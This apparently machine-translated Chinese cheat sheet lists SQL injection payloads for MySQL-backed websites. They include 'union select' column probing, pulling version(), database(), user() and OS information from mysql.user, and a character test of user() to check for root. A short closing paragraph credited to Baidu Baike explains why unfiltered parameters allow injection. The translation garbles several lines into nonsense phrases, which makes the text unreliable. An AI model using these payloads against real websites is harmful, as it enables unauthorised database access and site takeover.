突發場長度
按編號排序/*
匹配字段
和1=1聯合選擇1,2,3,4,5……n/*
臨界磁場位置
和1=2聯合選擇1,2,3,4,5…..n/*
使用內置函數突發數據庫信息
版本()數據庫()用戶()
不用猜可用字段就能爆炸數據庫信息(部分網站不適用):
和1 = 2 union all select version()/*
和1 = 2 union all select database()/*
和1 = 2 union all select user()/*
操作系統信息:
和1=2 union都選擇@ @ global . version _ compile _ OS from MySQL . user/*
數據庫權限:
而ord (mid (user(),1,1)) = 114/*返回作為root的普通描述。
擴展數據:
壹旦網站中的數據被某人獲取或修改,此人就可能獲得整個網站的控制權。至於如何獲取這些數據,MSSQL弱密碼的就不說了,剩下的極有可能是利用註入漏洞。
當用戶在網站外部提交壹個參數,進入數據庫進行處理,然後將處理後的結果發送給用戶,這就是最常見的動態網頁。但是,壹旦這個參數沒有被過濾掉,我們自己構造的sql語句也可以和這個參數壹起參與數據庫操作,那麽就會出現SQL註入漏洞。
壹個網站提交國外數據很正常。壹般參數是用來接受(請求)再處理的,而數據庫操作占了很大壹部分。
百度百科-註射